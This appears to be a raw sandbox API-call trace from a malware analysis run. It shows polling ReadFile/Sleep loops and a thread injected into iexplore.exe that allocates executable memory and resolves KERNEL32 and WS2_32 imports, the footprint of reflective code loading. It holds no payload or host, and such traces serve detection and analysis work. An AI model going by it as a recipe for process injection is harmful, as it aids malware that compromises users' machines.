	[0255.575] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.575] GetLastError () returned 0x218
	[0255.575] Sleep (dwMilliseconds=0xa) 
	[0255.600] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.600] GetLastError () returned 0x218
	[0255.600] Sleep (dwMilliseconds=0xa) 
	[0255.607] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.607] GetLastError () returned 0x218
	[0255.607] Sleep (dwMilliseconds=0xa) 
	[0255.622] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.622] GetLastError () returned 0x218
	[0255.622] Sleep (dwMilliseconds=0xa) 
	[0255.638] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.638] GetLastError () returned 0x218
	[0255.638] Sleep (dwMilliseconds=0xa) 
	[0255.653] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.657] GetLastError () returned 0x218
	[0255.666] Sleep (dwMilliseconds=0xa) 
	[0255.716] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.716] GetLastError () returned 0x218
	[0255.716] Sleep (dwMilliseconds=0xa) 
	[0255.761] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.761] GetLastError () returned 0x218
	[0255.761] Sleep (dwMilliseconds=0xa) 
	[0255.803] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.803] GetLastError () returned 0x218
	[0255.803] Sleep (dwMilliseconds=0xa) 
	[0255.809] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.809] GetLastError () returned 0x218
	[0255.809] Sleep (dwMilliseconds=0xa) 
	[0255.825] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.825] GetLastError () returned 0x218
	[0255.825] Sleep (dwMilliseconds=0xa) 
	[0255.892] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.892] GetLastError () returned 0x218
	[0255.892] Sleep (dwMilliseconds=0xa) 
	[0255.950] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.950] GetLastError () returned 0x218
	[0255.950] Sleep (dwMilliseconds=0xa) 
	[0255.997] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.997] GetLastError () returned 0x218
	[0255.997] Sleep (dwMilliseconds=0xa) 
	[0256.042] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.042] GetLastError () returned 0x218
	[0256.042] Sleep (dwMilliseconds=0xa) 
	[0256.050] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.050] GetLastError () returned 0x218
	[0256.050] Sleep (dwMilliseconds=0xa) 
	[0256.088] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.088] GetLastError () returned 0x218
	[0256.088] Sleep (dwMilliseconds=0xa) 
	[0256.090] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.090] GetLastError () returned 0x218
	[0256.090] Sleep (dwMilliseconds=0xa) 
	[0256.106] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.106] GetLastError () returned 0x218
	[0256.106] Sleep (dwMilliseconds=0xa) 
	[0256.122] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.122] GetLastError () returned 0x218
	[0256.122] Sleep (dwMilliseconds=0xa) 
	[0256.215] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.215] GetLastError () returned 0x218
	[0256.215] Sleep (dwMilliseconds=0xa) 
	[0256.262] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.262] GetLastError () returned 0x218
	[0256.262] Sleep (dwMilliseconds=0xa) 
	[0256.308] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.308] GetLastError () returned 0x218
	[0256.308] Sleep (dwMilliseconds=0xa) 
	[0256.309] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.309] GetLastError () returned 0x218
	[0256.309] Sleep (dwMilliseconds=0xa) 
	[0256.356] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.356] GetLastError () returned 0x218
	[0256.356] Sleep (dwMilliseconds=0xa) 
	[0256.371] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.371] GetLastError () returned 0x218
	[0256.371] Sleep (dwMilliseconds=0xa) 
	[0256.387] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.387] GetLastError () returned 0x218
	[0256.387] Sleep (dwMilliseconds=0xa) 
	[0256.480] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.480] GetLastError () returned 0x218
	[0256.480] Sleep (dwMilliseconds=0xa) 
	[0256.543] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.543] GetLastError () returned 0x218
	[0256.543] Sleep (dwMilliseconds=0xa) 
	[0256.589] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.589] GetLastError () returned 0x218
	[0256.590] Sleep (dwMilliseconds=0xa) 
	[0256.610] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.610] GetLastError () returned 0x218
	[0256.610] Sleep (dwMilliseconds=0xa) 
	[0256.621] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.621] GetLastError () returned 0x218
	[0256.621] Sleep (dwMilliseconds=0xa) 
	[0256.637] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.637] GetLastError () returned 0x218
	[0256.637] Sleep (dwMilliseconds=0xa) 
	[0256.652] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.652] GetLastError () returned 0x218
	[0256.653] Sleep (dwMilliseconds=0xa) 
	[0256.710] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.710] GetLastError () returned 0x218
	[0256.710] Sleep (dwMilliseconds=0xa) 
	[0256.746] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.746] GetLastError () returned 0x218
	[0256.746] Sleep (dwMilliseconds=0xa) 
	[0256.793] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.793] GetLastError () returned 0x218
	[0256.793] Sleep (dwMilliseconds=0xa) 
	[0256.839] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.840] GetLastError () returned 0x218
	[0256.840] Sleep (dwMilliseconds=0xa) 
	[0256.855] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.855] GetLastError () returned 0x218
	[0256.855] Sleep (dwMilliseconds=0xa) 
	[0256.871] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.871] GetLastError () returned 0x218
	[0256.871] Sleep (dwMilliseconds=0xa) 
	[0256.887] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.887] GetLastError () returned 0x218
	[0256.887] Sleep (dwMilliseconds=0xa) 
	[0256.902] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.902] GetLastError () returned 0x218
	[0256.902] Sleep (dwMilliseconds=0xa) 
	[0256.918] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0256.918] GetLastError () returned 0x218
	[0256.918] Sleep (dwMilliseconds=0xa) 

Thread:
	id = 275
	os_tid = 0xcfc


Thread:
	id = 276
	os_tid = 0xcf8


Process:
	id = "36"
	image_name = "iexplore.exe"
	filename = "c:\\program files\\internet explorer\\iexplore.exe"
	page_root = "0x7ee176a0"
	os_pid = "0xc38"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "injection"
	parent_id = "35"
	os_parent_pid = "0x110"
	cmd_line = "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" -nohome"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 174
	os_tid = 0xb4c


Thread:
	id = 175
	os_tid = 0xe38


Thread:
	id = 176
	os_tid = 0xe00


Thread:
	id = 177
	os_tid = 0xdf4


Thread:
	id = 178
	os_tid = 0xce8


Thread:
	id = 179
	os_tid = 0xc7c


Thread:
	id = 180
	os_tid = 0xc74


Thread:
	id = 181
	os_tid = 0xc6c


Thread:
	id = 182
	os_tid = 0xc68


Thread:
	id = 183
	os_tid = 0xc64


Thread:
	id = 184
	os_tid = 0xc60


Thread:
	id = 185
	os_tid = 0xc58


Thread:
	id = 186
	os_tid = 0xc50


Thread:
	id = 187
	os_tid = 0xc4c


Thread:
	id = 188
	os_tid = 0xc3c


Thread:
	id = 189
	os_tid = 0xa30

	[0191.157] VirtualAlloc (lpAddress=0x0, dwSize=0x18000, flAllocationType=0x3000, flProtect=0x40) returned 0x1a20000
	[0191.158] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76b10000
	[0191.159] GetProcAddress (hModule=0x76b10000, lpProcName="GetExitCodeThread") returned 0x76b46ddd
	[0191.159] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0191.159] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0191.159] GetProcAddress (hModule=0x76b10000, lpProcName="Sleep") returned 0x76b5ba46
	[0191.160] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThread") returned 0x76b6375d
	[0191.160] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0191.160] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleA") returned 0x76b5cf41
	[0191.160] GetProcAddress (hModule=0x76b10000, lpProcName="CreateFileW") returned 0x76b5cc56
	[0191.161] GetProcAddress (hModule=0x76b10000, lpProcName="DecodePointer") returned 0x7738cd10
	[0191.161] GetProcAddress (hModule=0x76b10000, lpProcName="WriteConsoleW") returned 0x76b582f1
	[0191.161] GetProcAddress (hModule=0x76b10000, lpProcName="UnhandledExceptionFilter") returned 0x76b6ed38
	[0191.161] GetProcAddress (hModule=0x76b10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76b63d01
	[0191.162] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcess") returned 0x76b5cdcf
	[0191.162] GetProcAddress (hModule=0x76b10000, lpProcName="TerminateProcess") returned 0x76b52331
	[0191.162] GetProcAddress (hModule=0x76b10000, lpProcName="IsProcessorFeaturePresent") returned 0x76b676b5
	[0191.162] GetProcAddress (hModule=0x76b10000, lpProcName="QueryPerformanceCounter") returned 0x76b5bb9f
	[0191.163] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcessId") returned 0x76b5cac4
	[0191.163] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentThreadId") returned 0x76b5bb80
	[0191.163] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76b62fde
	[0191.164] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeSListHead") returned 0x77395eeb
	[0191.164] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0191.164] GetProcAddress (hModule=0x76b10000, lpProcName="GetStartupInfoW") returned 0x76b63891
	[0191.164] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleW") returned 0x76b6374d
	[0191.165] GetProcAddress (hModule=0x76b10000, lpProcName="InterlockedExchange") returned 0x76b5bf0a
	[0191.165] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualFree") returned 0x76b61da4
	[0191.165] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualAlloc") returned 0x76b62fb6
	[0191.165] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryA") returned 0x76b6395c
	[0191.166] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualProtectEx") returned 0x76b9f5d9
	[0191.166] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleFileNameA") returned 0x76b633f6
	[0191.166] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcmpiA") returned 0x76b52249
	[0191.166] GetProcAddress (hModule=0x76b10000, lpProcName="HeapFree") returned 0x76b5bbd0
	[0191.167] GetProcAddress (hModule=0x76b10000, lpProcName="HeapReAlloc") returned 0x7739ff51
	[0191.167] GetProcAddress (hModule=0x76b10000, lpProcName="HeapAlloc") returned 0x77382dd6
	[0191.167] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcessHeap") returned 0x76b61280
	[0191.167] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcmpA") returned 0x76b48c59
	[0191.168] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcpyA") returned 0x76b59793
	[0191.168] GetProcAddress (hModule=0x76b10000, lpProcName="HeapSize") returned 0x77389bec
	[0191.168] GetProcAddress (hModule=0x76b10000, lpProcName="InterlockedFlushSList") returned 0x77383129
	[0191.168] GetProcAddress (hModule=0x76b10000, lpProcName="RtlUnwind") returned 0x76b47f70
	[0191.169] GetProcAddress (hModule=0x76b10000, lpProcName="GetLastError") returned 0x76b5bf00
	[0191.169] GetProcAddress (hModule=0x76b10000, lpProcName="SetLastError") returned 0x76b5bb08
	[0191.169] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0191.169] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0191.170] GetProcAddress (hModule=0x76b10000, lpProcName="DeleteCriticalSection") returned 0x77389ac5
	[0191.170] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76b63939
	[0191.170] GetProcAddress (hModule=0x76b10000, lpProcName="TlsAlloc") returned 0x76b635a1
	[0191.170] GetProcAddress (hModule=0x76b10000, lpProcName="TlsGetValue") returned 0x76b5da70
	[0191.171] GetProcAddress (hModule=0x76b10000, lpProcName="TlsSetValue") returned 0x76b5da88
	[0191.171] GetProcAddress (hModule=0x76b10000, lpProcName="TlsFree") returned 0x76b613b8
	[0191.171] GetProcAddress (hModule=0x76b10000, lpProcName="FreeLibrary") returned 0x76b5d9d0
	[0191.171] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryExW") returned 0x76b54775
	[0191.172] GetProcAddress (hModule=0x76b10000, lpProcName="RaiseException") returned 0x76b4eb60
	[0191.172] GetProcAddress (hModule=0x76b10000, lpProcName="ExitProcess") returned 0x76b6214f
	[0191.172] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleExW") returned 0x76b53e39
	[0191.173] GetProcAddress (hModule=0x76b10000, lpProcName="MultiByteToWideChar") returned 0x76b6452b
	[0191.173] GetProcAddress (hModule=0x76b10000, lpProcName="WideCharToMultiByte") returned 0x76b6450e
	[0191.173] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringW") returned 0x76b613d0
	[0191.173] GetProcAddress (hModule=0x76b10000, lpProcName="FindClose") returned 0x76b60e62
	[0191.174] GetProcAddress (hModule=0x76b10000, lpProcName="FindFirstFileExA") returned 0x76b9f3ef
	[0191.174] GetProcAddress (hModule=0x76b10000, lpProcName="FindNextFileA") returned 0x76b5a187
	[0191.174] GetProcAddress (hModule=0x76b10000, lpProcName="IsValidCodePage") returned 0x76b6c1c0
	[0191.174] GetProcAddress (hModule=0x76b10000, lpProcName="GetACP") returned 0x76b639aa
	[0191.174] GetProcAddress (hModule=0x76b10000, lpProcName="GetOEMCP") returned 0x76b53db9
	[0191.175] GetProcAddress (hModule=0x76b10000, lpProcName="GetCPInfo") returned 0x76b61e2e
	[0191.175] GetProcAddress (hModule=0x76b10000, lpProcName="GetCommandLineA") returned 0x76b698ff
	[0191.175] GetProcAddress (hModule=0x76b10000, lpProcName="GetCommandLineW") returned 0x76b6679e
	[0191.175] GetProcAddress (hModule=0x76b10000, lpProcName="GetEnvironmentStringsW") returned 0x76b61dbc
	[0191.176] GetProcAddress (hModule=0x76b10000, lpProcName="FreeEnvironmentStringsW") returned 0x76b61dc3
	[0191.176] GetProcAddress (hModule=0x76b10000, lpProcName="GetStdHandle") returned 0x76b61e46
	[0191.177] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileType") returned 0x76b675a5
	[0191.177] GetProcAddress (hModule=0x76b10000, lpProcName="GetStringTypeW") returned 0x76b667c8
	[0191.177] GetProcAddress (hModule=0x76b10000, lpProcName="SetStdHandle") returned 0x76b9f589
	[0191.177] GetProcAddress (hModule=0x76b10000, lpProcName="WriteFile") returned 0x76b61400
	[0191.178] GetProcAddress (hModule=0x76b10000, lpProcName="FlushFileBuffers") returned 0x76b47f81
	[0191.178] GetProcAddress (hModule=0x76b10000, lpProcName="GetConsoleCP") returned 0x76b62c8a
	[0191.178] GetProcAddress (hModule=0x76b10000, lpProcName="GetConsoleMode") returned 0x76b62412
	[0191.178] GetProcAddress (hModule=0x76b10000, lpProcName="SetFilePointerEx") returned 0x76b4f5b2
	[0191.179] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75a90000
	[0191.179] GetProcAddress (hModule=0x75a90000, lpProcName="WSAIoctl") returned 0x75a92fe7
	[0191.179] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x771d0000
	[0191.180] GetProcAddress (hModule=0x771d0000, lpProcName="PathFindFileNameA") returned 0x771e00aa
	[0191.180] GetProcAddress (hModule=0x771d0000, lpProcName="StrChrA") returned 0x771dc5e6
	[0191.180] NtFlushInstructionCache (ProcessHandle=0xffffffff, BaseAddress=0x0, NumberOfBytesToFlush=0x0) returned 0x0
	[0191.180] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x551fb48 | out: lpSystemTimeAsFileTime=0x551fb48*(dwLowDateTime=0x5b7f7320, dwHighDateTime=0x1d50a6a)) 
	[0191.180] GetCurrentThreadId () returned 0xa30
	[0191.180] GetCurrentProcessId () returned 0xc38
	[0191.180] QueryPerformanceCounter (in: lpPerformanceCount=0x551fb40 | out: lpPerformanceCount=0x551fb40*=26501802556) returned 1
	[0191.180] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0191.180] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0191.180] GetLastError () returned 0x57
	[0191.180] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x6c330000
	[0191.183] GetProcAddress (hModule=0x6c330000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0191.183] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0191.183] GetLastError () returned 0x57
	[0191.183] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0191.187] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0191.187] GetLastError () returned 0x57
	[0191.187] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76b10000
	[0191.187] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0191.187] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0191.187] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0191.188] GetLastError () returned 0x57
	[0191.188] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x6c330000
	[0191.188] GetProcAddress (hModule=0x6c330000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0191.188] GetProcessHeap () returned 0x2b0000
	[0191.188] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
